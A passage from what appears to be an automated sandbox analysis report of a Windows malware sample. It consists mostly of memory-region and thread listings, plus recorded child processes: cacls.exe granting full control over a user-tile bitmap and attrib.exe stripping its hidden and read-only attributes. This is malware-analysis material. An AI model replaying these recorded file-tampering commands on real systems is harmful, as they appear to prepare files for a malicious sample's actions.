"c:\\windows\\system32\\napinsp.dll") Region: id = 25373 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 25374 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = 
"dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 25375 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 25376 start_va = 0x737a0000 end_va = 0x737a7fff entry_point = 0x737a0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 25377 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 25378 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 25379 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 25380 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 25381 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 25382 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 25383 start_va = 0x748d0000 end_va = 0x748d8fff 
entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 25384 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 25385 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 25386 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 25387 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 25388 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25389 start_va = 0x74ca0000 end_va = 0x74cc1fff entry_point = 0x74ca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 25390 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 25391 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") 
Region: id = 25392 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 25393 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25394 start_va = 0x75060000 end_va = 0x75070fff entry_point = 0x75060000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 25395 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 25396 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 25397 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 25398 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 25399 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25400 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = 
"\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 25401 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25402 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25403 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25404 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 25405 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25406 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25407 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 25408 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25409 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = 
mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25410 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25411 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25412 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 25413 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25414 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25415 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 25416 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25417 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 25418 start_va = 0x773c0000 end_va = 
0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25419 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25420 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25421 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25422 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 25423 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 25424 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 25425 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 25426 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 25427 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25428 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 25429 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd5000" filename = "" Region: id = 25430 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25431 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 25432 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25433 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25434 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25435 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25436 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 469 os_tid = 0x8c0 Thread: id = 470 os_tid = 0x490 Thread: id = 471 os_tid = 0x32c Thread: id = 472 os_tid = 0x2a8 Thread: id = 473 os_tid = 0x6d4 Thread: id = 474 os_tid = 0x718 Thread: id = 475 os_tid = 0x124 Thread: id = 476 os_tid = 0x7bc Thread: id = 477 os_tid = 0x7a8 Thread: id = 478 os_tid = 0x7a4 Thread: id = 479 os_tid = 0x414 Thread: id = 480 os_tid = 0x400 Thread: id = 481 os_tid = 0x3ec Thread: id = 482 os_tid = 0xa1c Thread: id = 483 os_tid = 0xbd4 Thread: id = 898 os_tid = 0xc04 Thread: id = 899 os_tid = 0x62c Thread: id = 939 os_tid = 0xe44 Thread: id = 950 os_tid = 0xed4 Process: id = "340" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "338" os_parent_pid = "0xcfc" cmd_line = "CACLS 
\"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25465 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25466 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 25467 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 25468 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 25469 start_va = 0x7d0000 end_va = 0x7d8fff entry_point = 0x7d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25470 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25471 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25472 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 25473 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25474 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25475 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25476 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25477 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25478 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25479 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 25480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25481 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25483 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" 
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25484 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25485 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25486 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 484 os_tid = 0xc98 Thread: id = 485 os_tid = 0xc5c Process: id = "341" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xa10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "338" os_parent_pid = "0xcfc" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25487 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25488 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25489 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25490 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25491 start_va = 0x9c0000 end_va = 0x9c6fff entry_point = 0x9c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25492 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25493 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25494 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25495 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25496 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25497 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25498 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25499 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25500 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000300000" filename = "" Region: id = 25501 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 25502 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25503 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25504 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25507 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25508 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25509 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 25510 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25511 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25512 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25513 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25514 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 25515 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25516 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 487 os_tid = 0xc38 Process: id = "342" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16ee0" os_pid = "0xca8" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "337" os_parent_pid = "0xb88" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], 
"CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006c9e7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 25517 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25518 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25519 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25520 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25521 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25522 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 25523 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 25524 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 25525 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 25526 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 25527 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000140000" filename = "" Region: id = 25528 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 25529 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 25530 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 25531 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 25532 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 25533 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 25534 start_va = 0x4c0000 end_va = 0x78efff entry_point = 0x4c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 25535 start_va = 0x790000 end_va = 0x857fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 25536 start_va = 0x860000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 25537 start_va = 0x970000 end_va = 0xd62fff entry_point = 0x0 region_type = pagefile_backed name = 